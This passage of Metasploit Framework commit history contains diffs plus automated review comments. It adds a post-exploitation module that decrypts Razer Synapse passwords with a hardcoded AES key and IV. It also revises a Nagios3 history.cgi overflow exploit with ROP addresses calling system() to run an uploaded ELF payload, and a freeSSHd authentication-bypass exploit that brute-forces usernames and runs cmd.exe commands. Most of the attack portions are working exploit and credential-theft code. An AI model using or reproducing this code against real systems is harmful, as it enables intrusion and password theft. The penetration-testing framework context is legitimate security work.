insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 60f46a0e7c8c..c8db9f84627f 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb 
@@ -174,7 +174,7 @@ def handle_connection(conn, opts={}) # Override to deal with sending the final stage in cases where # {#generate_stage} is not the whole picture, such as when uploading # an executable. The default is to simply attempt to create a session - # on the given +conn+ socket with {Handler#create_session}. + # on the given +conn+ socket with {Msf::Handler#create_session}. # # @param (see Handler#create_session) # @return (see Handler#create_session) @@ -191,6 +191,7 @@ def handle_intermediate_stage(conn, payload) end # Encodes the stage prior to transmission + # @return [String] Encoded version of +stg+ def encode_stage(stg) return stg unless encode_stage? From 5109cc97feb664d3dde35ae32a2260671cafb42d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jan 2013 14:11:53 -0600 Subject: [PATCH 033/421] Add more verbs [SeeRM: #7138] by jabra --- modules/auxiliary/scanner/http/verb_auth_bypass.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 94739be2256b..4cf89e603f7b 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -42,7 +42,9 @@ def run_host(ip) 'HEAD', 'TRACE', 'TRACK', - 'Wmap' + 'Wmap', + 'get', + 'trace' ] From 9dc42e93e77ca800c99c67cb76fbf0dff85fee39 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jan 2013 14:36:41 -0600 Subject: [PATCH 034/421] Reduce unnecessary indent level --- .../scanner/http/verb_auth_bypass.rb | 125 +++++++++--------- 1 file changed, 60 insertions(+), 65 deletions(-) diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 4cf89e603f7b..a91a2a02f530 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb 
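Review bot: The inline link in the first stager.rb hunk is now `{Msf::Handler#create_session}`, but the two tag lines below it still read `@param (see Handler#create_session)` and `@return (see Handler#create_session)`. If the short name did not resolve for the inline link, it presumably will not resolve for the `(see …)` references either, so they should be qualified the same way: `# @param (see Msf::Handler#create_session)` and `# @return (see Msf::Handler#create_session)`. The method these comments document lies outside the hunk.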
@@ -8,7 +8,6 @@ require 'msf/core' - class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first @@ -21,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'HTTP Verb Authentication Bypass Scanner', - 'Description' => %q{ + 'Name' => 'HTTP Verb Authentication Bypass Scanner', + 'Description' => %q{ This module test for authentication bypass using different HTTP verbs. }, - 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE)) + 'Author' => [ 'et [at] metasploit.com' ], + 'License' => BSD_LICENSE)) register_options( [ 
@@ -35,74 +34,70 @@ def initialize(info = {}) ], self.class) end - # Fingerprint a single host def run_host(ip) + begin + test_verbs(ip) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end - verbs = [ - 'HEAD', - 'TRACE', - 'TRACK', - 'Wmap', - 'get', - 'trace' - ] + def test_verbs(ip) + verbs = [ 'HEAD', 'TRACE', 'TRACK', 'Wmap', 'get', 'trace' ] + res = send_request_raw({ + 'uri' => normalize_uri(datastore['PATH']), + 'method' => 'GET' + }, 10) - begin - res = send_request_raw({ + return if not res + + if not res.headers['WWW-Authenticate'] + print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}") + return + end + + auth_code = res.code + + print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]") + + report_note( + :host => ip, + :proto => 'tcp', + :sname => (ssl ? 'https' : 'http'), + :port => rport, + :type => 'WWW_AUTHENTICATE', + :data => "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}", + :update => :unique_data + ) + + verbs.each do |tv| + resauth = send_request_raw({ 'uri' => normalize_uri(datastore['PATH']), - 'method' => 'GET' + 'method' => tv }, 10) - if res - - auth_code = res.code - - if res.headers['WWW-Authenticate'] - print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]") - - report_note( - :host => ip, - :proto => 'tcp', - :sname => (ssl ? 
'https' : 'http'), - :port => rport, - :type => 'WWW_AUTHENTICATE', - :data => "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}", - :update => :unique_data - ) - - verbs.each do |tv| - resauth = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']), - 'method' => tv - }, 10) - - if resauth - print_status("Testing verb #{tv} resp code: [#{resauth.code}]") - if resauth.code != auth_code and resauth.code <= 302 - print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}") - - # Unable to use report_web_vuln as method is not in list of allowed methods. - - report_note( - :host => ip, - :proto => 'tcp', - :sname => (ssl ? 'https' : 'http'), - :port => rport, - :type => 'AUTH_BYPASS_VERB', - :data => "#{datastore['PATH']} Verb: #{tv}", - :update => :unique_data - ) - - end - end - end - else - print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}") - end + next if not resauth + + print_status("Testing verb #{tv}, resp code: [#{resauth.code}]") + + if resauth.code != auth_code and resauth.code <= 302 + print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}") + + # Unable to use report_web_vuln as method is not in list of allowed methods. + + report_note( + :host => ip, + :proto => 'tcp', + :sname => (ssl ? 'https' : 'http'), + :port => rport, + :type => 'AUTH_BYPASS_VERB', + :data => "#{datastore['PATH']} Verb: #{tv}", + :update => :unique_data + ) end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE end end + end + From 2ee0c0d8fb9bc33dab04ccd736716e28a35aa06d Mon Sep 17 00:00:00 2001 
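Review bot: Both `rescue` clauses in the new `run_host` have empty bodies, so a host that refused the connection or timed out looks the same in the output as a host where nothing was found. Binding the exception and reporting it in verbose mode keeps the scan quiet by default while leaving a trace, e.g. `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e` followed by `vprint_error("#{ip} - #{e.class}: #{e.message}")`, and the same for the `::Timeout::Error, ::Errno::EPIPE` clause. The explicit `begin` is also unnecessary, since `rescue` can attach directly to the `def`. Separately, `resauth.code <= 302` in `test_verbs` counts a redirect as a possible bypass, so a 302 to a login page will be recorded as `AUTH_BYPASS_VERB`; the note data should say that the finding needs manual confirmation.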
From: James Lee
Date: Tue, 15 Jan 2013 16:59:01 -0600
Subject: [PATCH 035/421] Add simple specs for Rex::Encoding::Xor*
---
spec/lib/rex/encoding/xor/byte.rb | 7 +++++++
spec/lib/rex/encoding/xor/dword.rb | 7 +++++++
spec/lib/rex/encoding/xor/qword.rb | 7 +++++++
spec/lib/rex/encoding/xor/word.rb | 7 +++++++
spec/support/shared/examples/xor_encoder.rb | 20 ++++++++++++++++++++
5 files changed, 48 insertions(+)
create mode 100644 spec/lib/rex/encoding/xor/byte.rb
create mode 100644 spec/lib/rex/encoding/xor/dword.rb
create mode 100644 spec/lib/rex/encoding/xor/qword.rb
create mode 100644 spec/lib/rex/encoding/xor/word.rb
create mode 100644 spec/support/shared/examples/xor_encoder.rb
diff --git a/spec/lib/rex/encoding/xor/byte.rb b/spec/lib/rex/encoding/xor/byte.rb
new file mode 100644
index 000000000000..03dae077215b
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/byte.rb
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/byte'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Byte do
+ it_behaves_like "an xor encoder", 1
+end
diff --git a/spec/lib/rex/encoding/xor/dword.rb b/spec/lib/rex/encoding/xor/dword.rb
new file mode 100644
index 000000000000..353909385549
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/dword.rb
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/dword'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Dword do
+ it_behaves_like "an xor encoder", 4
+end
diff --git a/spec/lib/rex/encoding/xor/qword.rb b/spec/lib/rex/encoding/xor/qword.rb
new file mode 100644
index 000000000000..12ae6f6cd381
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/qword.rb
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/qword'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Qword do
+ it_behaves_like "an xor encoder", 8
+end
diff --git a/spec/lib/rex/encoding/xor/word.rb b/spec/lib/rex/encoding/xor/word.rb
new file mode 100644
index 000000000000..78284b96d5c5
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/word.rb
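Review bot: The new spec files are named `byte.rb`, `dword.rb`, `qword.rb` and `word.rb` (the last one is in the next hunk), without the `_spec.rb` suffix that RSpec's default file pattern matches. Unless the project's spec task sets its own pattern, running the suite will not load them and the shared examples will never execute. Renaming them to `byte_spec.rb`, `dword_spec.rb`, `qword_spec.rb` and `word_spec.rb` removes that dependency. Whether `spec/support/shared/examples/xor_encoder.rb` is loaded by `spec_helper` is not visible here and should be checked as well.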
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/word'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Word do
+ it_behaves_like "an xor encoder", 2
+end
diff --git a/spec/support/shared/examples/xor_encoder.rb b/spec/support/shared/examples/xor_encoder.rb
new file mode 100644
index 000000000000..df9cd08c9ae6
--- /dev/null
+++ b/spec/support/shared/examples/xor_encoder.rb
@@ -0,0 +1,20 @@
+shared_examples_for 'an xor encoder' do |keysize|
+
+ it "should encode one block" do
+ # Yup it returns one of its arguments in an array... Because spoon.
+ encoded, key = described_class.encode("A"*keysize, "A"*keysize)
+ encoded.should eql("\x00"*keysize)
+
+ encoded, key = described_class.encode("\x0f"*keysize, "\xf0"*keysize)
+ encoded.should eql("\xff"*keysize)
+
+ encoded, key = described_class.encode("\xf7"*keysize, "\x7f"*keysize)
+ encoded.should eql("\x88"*keysize)
+ end
+
+ it "should encode multiple blocks" do
+ encoded, key = described_class.encode("\xf7"*keysize*40, "\x7f"*keysize)
+ encoded.should eql("\x88"*keysize*40)
+ end
+
+end
From b2cd65e28312d5e9b49d2701f693ac3a54d9e498 Mon Sep 17 00:00:00 2001
From: smilingraccoon
Date: Tue, 15 Jan 2013 21:14:49 -0500
Subject: [PATCH 036/421] adding razer_synapse.rb
---
.../gather/credentials/razer_synapse.rb | 119 ++++++++++++++++++
1 file changed, 119 insertions(+)
create mode 100644 modules/post/windows/gather/credentials/razer_synapse.rb
diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb
new file mode 100644
index 000000000000..c86f1b9c0aa1
--- /dev/null
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
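Review bot: The shared examples in `xor_encoder.rb` only feed inputs whose length is an exact multiple of `keysize`, so a buffer with a trailing partial block and an empty buffer are not covered. Those are the inputs where a block-wise XOR routine is most likely to misbehave, and a third example that encodes `"\xf7"*(keysize*2+1)` and an empty string would pin that behaviour. The second return value is bound to `key` in every call but never asserted; if it is meant to equal the key passed in, add `key.should eql("\x7f"*keysize)`, otherwise bind it to `_key` so that the unused local is explicit.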
@@ -0,0 +1,119 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/windows/user_profiles' +require 'openssl' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Razer Synapse Password Extraction', + 'Description' => %q{ + This module will enumerate passwords stored by the Razer Synapse + client. The encryption key and iv is publicly known. This module + will not only extract encrypted password but will also decrypt + password using public key. Affects version 1.7.15 and earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Thomas McCarthy "smilingraccoon" ', + 'Matt Howard "pasv" ', #PoC + 'Brandon McCann "zeknox" ' + ], + 'SessionTypes' => [ 'meterpreter' ], + 'Platform' => [ 'win' ], + + )) + end + + # decrypt password + def decrypt(hash) + cipher = OpenSSL::Cipher::Cipher.new 'aes-256-cbc' + cipher.decrypt + cipher.key = "hcxilkqbbhczfeultgbskdmaunivmfuo" + cipher.iv = "ryojvlzmdalyglrj" + + hash.each_pair { |user,pass| + pass = pass.unpack("m")[0] + + password = cipher.update pass + password << cipher.final rescue return nil + + store_creds(user, password.split("||")[1]) + print_good("Found credentials") + print_good("\tUser: #{user}") + print_good("\tPassword: #{password.split("||")[1]}") + } + end + + def store_creds(user, pass) + if db + report_auth_info( + :host => client.sock.peerhost, + :port => 443, + :ptype => 'password', + :sname => 'razer_synapse', + :user => user, + :pass => pass, + :duplicate_ok => true, + :active => true + ) + vprint_status("Loot stored in the db") + end + end + + # Loop throuhg config, grab user and pass + def 
parse_config(config) + if not config =~ /\d<\/Version>/ + creds = {} + cred_group = config.split("") + cred_group.each { |cred| + user = /([^<]+)<\/Username>/.match(cred) + pass = /([^<]+)<\/Password>/.match(cred) + if user and pass + creds[user[1]] = pass[1] + end + } + return creds + else + print_error("Module only works against configs from version < 1.7.15") + return nil + end + end + + # main control method + def run + grab_user_profiles().each do |user| + if user['LocalAppData'] + accounts = user['LocalAppData'] + "\\Razer\\Synapse\\Accounts\\RazerLoginData.xml" + # open the file for reading + config = client.fs.file.new(accounts, 'r') rescue nil + next if config.nil? + print_status("Config found for user #{user['UserName']}") + + contents = config.read + config.close + + # read the contents of file + creds = parse_config(contents) + if creds + decrypt(creds) + else + print_error("Could not read config or empty for #{user['UserName']}") + end + end + end + end +end \ No newline at end of file From 12e7949183d0e6a15ec43fc3decd73a01657d80f Mon Sep 17 00:00:00 2001 From: smilingraccoon Date: Tue, 15 Jan 2013 21:23:49 -0500 Subject: [PATCH 037/421] msftidy change --- modules/post/windows/gather/credentials/razer_synapse.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index c86f1b9c0aa1..96f94572968e 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb 
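Review bot: The module description does not match the code in two places. It says the password is decrypted "using public key", but `decrypt` sets a fixed `cipher.key` and `cipher.iv` on `aes-256-cbc`, i.e. one static symmetric key, so wording such as `using the publicly known static AES key and IV` would be accurate. It also states "Affects version 1.7.15 and earlier" while `parse_config` prints `Module only works against configs from version < 1.7.15`; one of the two needs correcting so that readers know which client versions store recoverable passwords. The hunk adds the whole file, so both strings are new code.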
@@ -23,7 +23,7 @@ def initialize(info={}) This module will enumerate passwords stored by the Razer Synapse client. The encryption key and iv is publicly known. This module will not only extract encrypted password but will also decrypt - password using public key. Affects version 1.7.15 and earlier. + password using public key. Affects version 1.7.15 and earlier. }, 'License' => MSF_LICENSE, 'Author' => @@ -33,7 +33,7 @@ def initialize(info={}) 'Brandon McCann "zeknox" ' ], 'SessionTypes' => [ 'meterpreter' ], - 'Platform' => [ 'win' ], + 'Platform' => [ 'win' ], )) end From 064ea63a72b9fa0ade441ff77a29b1226826a879 Mon Sep 17 00:00:00 2001 From: Jose Selvi Date: Wed, 16 Jan 2013 05:22:43 +0100 Subject: [PATCH 038/421] Fixes --- .../unix/webapp/nagios3_history_cgi.rb | 143 ++++++++++++------ 1 file changed, 93 insertions(+), 50 deletions(-) diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index c8c0cfb39f94..a1e61e57c68e 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -30,11 +30,14 @@ def initialize(info = {}) 'References' => [ [ 'CVE', '2012-6096' ], + [ 'OSVDB', '88322' ], + [ 'BID', '56879' ], + [ 'EDB', '24084' ], [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ], [ 'URL', 'http://pastebin.com/FJUNyTaj' ], ], 'Platform' => ['unix', 'linux'], - 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'Arch' => [ ARCH_X86 ], 'Privileged' => false, 'Payload' => { @@ -45,10 +48,10 @@ def initialize(info = {}) [ [ 'Automatic Target', { 'auto' => true }], # NOTE: All addresses are from the history.cgi binary - [ 'CentOS (nagios-3.4.3-1.el6.i686.rpm)', + [ 'Appliance Nagios XI 2012R1.3 (CentOS 6.x)', { - 'BannerRE' => 'CentOS', - 'VersionRE' => '3.4.3', + 'BannerRE' => 'Apache/2.2.15 (CentOS)', + 'VersionRE' => '3.4.1', 'Arch' => ARCH_X86, 'Offset' => 0xc43, 'RopStack' => 
@@ -62,7 +65,7 @@ def initialize(info = {}) ] } ], - [ 'Debian (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. + [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. { 'BannerRE' => 'Debian', 'VersionRE' => '3.3.0', @@ -70,12 +73,12 @@ def initialize(info = {}) 'Offset' => 0xc37, 'RopStack' => [ - 0x0804b620, # unescape_cgi_input() - 0x08048fe4, # pop, ret - 0x080727a0, # buffer addr - 0x08048c7c, # system() - 0xdeafbabe, # if should be exit() but it's not - 0x080727a0 # buffer addr + 0x0804b620, # unescape_cgi_input() + 0x08048fe4, # pop, ret + 0x080727a0, # buffer addr + 0x08048c7c, # system() + 0xdeafbabe, # if should be exit() but it's not + 0x080727a0 # buffer addr ] } ], 
@@ -85,20 +88,29 @@ def initialize(info = {}) register_options( [ - OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), - OptString.new('USER', [false, "The username to authenticate with", "guest"]), - OptString.new('PASS', [false, "The password to authenticate with", "guest"]), + OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), + OptString.new('USER', [false, "The username to authenticate with", "nagiosadmin"]), + OptString.new('PASS', [false, "The password to authenticate with", "nagiosadmin"]), ], self.class) end def detect_version(uri) # Send request - res = send_request_raw({ - 'uri' => uri, - 'method' => 'GET', - }, 90) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, + }, 10) - # Detection unknown if error + # Error handling + if(res.code == 401) + print_error("Please specify correct values for USER and PASS") + return nil, nil + end + if(res.code == 404) + print_error("Please specify the correct path to history.cgi in the URI parameter") + return nil, nil + end if res.nil? print_error("Unable to get a response from the server") return nil, nil 
@@ -107,46 +119,74 @@ def detect_version(uri) # Extract banner from response banner = res.headers['Server'] - # Version undetected by now - String = "Nagios® Core™ 3.4.1 -" + # Extract version from body version = nil + version_line = res.body.match(/Nagios® Core™ [0-9.]+ -/) + if not version_line.nil? + version = version_line[0].match(/[0-9.]+/)[0] + end + + # Check in an alert exists + alert = res.body.match(/ALERT/) - return version, banner + return version, banner, alert end - def exploit - uri = normalize_uri(datastore['URI']) + def select_target(version, banner) + # Get version information + if not banner.nil? + print_status("Web Server banner: #{banner}") + end + if not version.nil? + print_status("Nagios version detected: #{version}") + end - # Automatic Targeting - mytarget = nil - if (target['auto']) - print_status("Automatically detecting the target...") + # No banner and version, no target + if banner.nil? or version.nil? + return nil + end - # Get version information - version, banner = detect_version(uri) - if not banner.nil? - print_status("Web Server banner: #{banner}") + # Try regex for each target + self.targets.each do |t| + if t['BannerRE'].nil? or t['VersionRE'].nil? # It doesn't exist in Auto Target + next end - if not version.nil? - print_status("Nagios version detected: #{version}") + regexp1 = Regexp.escape(t['BannerRE']) + regexp2 = Regexp.escape(t['VersionRE']) + if ( banner =~ /#{regexp1}/ and version =~ /#{regexp2}/ ) then + return t end + end + # If not detected, return nil + return nil + end - # No banner, no target - if banner.nil? - fail_with(Exploit::Failure::NoTarget, "No matching target") - end + def check + print_status("Checking banner and version...") + # Detect version + banner, version, alert = detect_version(target_uri.path) + # Select target + mytarget = select_target(banner, version) - # Try regex for each target - self.targets.each do |t| - if t['BannerRE'].nil? 
# It doesn't exist in Auto Target - next - end - regexp = Regexp.escape(t['BannerRE']) - if ( banner =~ /#{regexp}/ ) then - mytarget = t - break - end - end + if mytarget.nil? + print_error("No matching target") + return CheckCode::Unknown + end + if alert.nil? + print_error("At least one ALERT is needed in order to exploit") + return CheckCode::Safe + end + return CheckCode::Vulnerable + end + + def exploit + # Automatic Targeting + mytarget = nil + if (target['auto']) + print_status("Automatically detecting the target...") + banner, version, alert = detect_version(target_uri.path) + mytarget = select_target(banner, version) if mytarget.nil? fail_with(Exploit::Failure::NoTarget, "No matching target") end @@ -155,7 +195,10 @@ def exploit end print_status("Selected Target: #{mytarget.name}") - print_status("Sending request to http://#{rhost}:#{rport}#{uri}") + if alert and alert.nil? + fail_with(Exploit::Failure::NoTarget, "At least one ALERT is needed in order to exploit") + end + print_status("Sending request to http://#{rhost}:#{rport}#{target_uri.path}") # Generate a payload ELF to execute elfbin = generate_payload_exe @@ -178,7 +221,7 @@ def exploit # Send exploit res = send_request_cgi({ 'method' => 'GET', - 'uri' => uri, + 'uri' => target_uri.path, 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, 'vars_get' => { From 0f24671cf7a1a353bd3456e9c69fd59dbdacaf69 Mon Sep 17 00:00:00 2001 
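Review bot: `detect_version` returns `version, banner, alert`, but `check` and `exploit` unpack it as `banner, version, alert = detect_version(target_uri.path)` and then call `select_target(banner, version)`, whose parameters are `(version, banner)`. The two swaps cancel, so target selection works, but inside `check` and `exploit` the local named `banner` holds the Nagios version and `version` holds the Server header, which will mislead the next change that reads them. Unpacking as `version, banner, alert = detect_version(target_uri.path)` and calling `select_target(version, banner)` fixes the naming; the later hunk at `@@ -183,9 +181,9 @@` keeps the swapped order and needs the same change. The error paths in `detect_version` return `nil, nil` while the success path returns three values, so `return nil, nil, nil` would make the arity explicit.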
From: sinn3r Date: Wed, 16 Jan 2013 02:14:52 -0600 Subject: [PATCH 039/421] Changes how the usernames are loaded. Allows usernames to be loaded as a file (wordlist), that way the it's much easier to manage. It defaults to unix_users.txt, because these usernames are common in any SSH hosts out there. If the user only wants to try a specific user (which is better, because you reduce traffic noise that way), then he/she can set the USERNAME option, and that should be the only one tried -- similar to how AuthBrute behaves. I also fixed the regex in check(). --- .../windows/ssh/freesshd_authbypass.rb | 65 ++++++++++++++----- 1 file changed, 50 insertions(+), 15 deletions(-) diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 1bf45ab16f90..4e667138fe53 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -1,6 +1,12 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' -require 'tempfile' + class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -42,9 +48,16 @@ def initialize(info={}) register_options( [ - OptInt.new('RPORT', [false, 'The target port', 22]), - OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator']) + Opt::RPORT(22), + OptString.new('USERNAME', [false, 'A specific username to try']), + OptPath.new( + 'USER_FILE', + [ true, "File containing usernames, one per line", + # Defaults to unix_users.txt, because this is the closest one we can try + File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ] + ) ], self.class) + end def load_netssh 
@@ -60,9 +73,9 @@ def check connect banner = sock.recv(30) disconnect - if banner =~ /SSH-2.0-WeOnlyDo/ + if banner =~ /SSH\-2\.0\-WeOnlyDo/ version=banner.split(" ")[1] - return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/ + return Exploit::CheckCode::Vulnerable if version =~ /(2\.1\.3|2\.0\.6)/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe @@ -85,9 +98,9 @@ def upload_payload(connection) raise ArgumentError end cmds.each { |cmd| - ret = connection.exec!("cmd.exe /c "+cmd) + connection.exec!("cmd.exe /c "+cmd) + } - end def setup_ssh_options @@ -103,7 +116,7 @@ def setup_ssh_options end def do_login(username,options) - print_status("Trying username "+username) + print_status("Trying username '#{username}'") options[:username]=username transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options) @@ -114,15 +127,36 @@ def do_login(username,options) Timeout.timeout(10) do connection.exec!('cmd.exe /c echo') end - rescue RuntimeError + rescue RuntimeError return nil - rescue Timeout::Error + rescue Timeout::Error print_status("Timeout") return nil end return connection end + # + # Cannot use the auth_brute mixin, because if we do, a payload handler won't start. + # So we have to write our own each_user here. + # + def each_user(&block) + user_list = [] + if datastore['USERNAME'] and !datastore['USERNAME'].empty? + user_list << datastore['USERNAME'] + else + f = File.open(datastore['USER_FILE'], 'rb') + buf = f.read + f.close + + user_list = (user_list | buf.split).uniq + end + + user_list.each do |user| + block.call(user) + end + end + def exploit # # Load net/ssh so we can talk the SSH protocol 
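Review bot: In the new `each_user`, the wordlist is read with `File.open` / `f.read` / `f.close`, so the handle stays open if `read` raises, and an unreadable `USER_FILE` surfaces as a raw exception from inside `exploit`. `buf = File.open(datastore['USER_FILE'], 'rb') { |f| f.read }` closes the handle on every path. `buf.split` never yields empty tokens and `|` already removes duplicates, so the trailing `.uniq` here and the `next if username.empty?` in the following `exploit` hunk are redundant.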
@@ -133,21 +167,22 @@ def exploit return end - options=setup_ssh_options + options = setup_ssh_options connection = nil - usernames=datastore['USERNAMES'].split(' ') - usernames.each { |username| + each_user do |username| + next if username.empty? connection=do_login(username,options) break if connection - } + end if connection - print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)") + print_status("Uploading payload, this may take several minutes...") upload_payload(connection) handler end end + end From 2348a0b066d6ea453aa0e12104f011503ce45ba1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 16 Jan 2013 11:55:14 +0100 Subject: [PATCH 040/421] final cleanup and testing --- .../unix/webapp/nagios3_history_cgi.rb | 72 +++++++++---------- 1 file changed, 36 insertions(+), 36 deletions(-) diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index a1e61e57c68e..39b3e8fe2868 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -9,7 +9,7 @@ require 'rex' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -22,9 +22,10 @@ def initialize(info = {}) Nagios3 history.cgi script. }, 'Author' => [ - 'Anonymous ', # Original finding - 'blasty ', # First working exploit - 'Jose Selvi ' # Metasploit module + 'Unknown ', # Original finding + 'blasty ', # First working exploit + 'Jose Selvi ', # Metasploit module + 'Daniele Martini ' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => 
@@ -33,8 +34,7 @@ def initialize(info = {}) [ 'OSVDB', '88322' ], [ 'BID', '56879' ], [ 'EDB', '24084' ], - [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ], - [ 'URL', 'http://pastebin.com/FJUNyTaj' ], + [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ] ], 'Platform' => ['unix', 'linux'], 'Arch' => [ ARCH_X86 ], @@ -65,10 +65,10 @@ def initialize(info = {}) ] } ], - [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. + [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)', { - 'BannerRE' => 'Debian', - 'VersionRE' => '3.3.0', + 'BannerRE' => 'Apache/2.2.9 (Debian)', + 'VersionRE' => '3.0.6', 'Arch' => ARCH_X86, 'Offset' => 0xc37, 'RopStack' => @@ -88,7 +88,7 @@ def initialize(info = {}) register_options( [ - OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), + OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), OptString.new('USER', [false, "The username to authenticate with", "nagiosadmin"]), OptString.new('PASS', [false, "The password to authenticate with", "nagiosadmin"]), ], self.class) @@ -103,6 +103,10 @@ def detect_version(uri) }, 10) # Error handling + if res.nil? + print_error("Unable to get a response from the server") + return nil, nil + end if(res.code == 401) print_error("Please specify correct values for USER and PASS") return nil, nil 
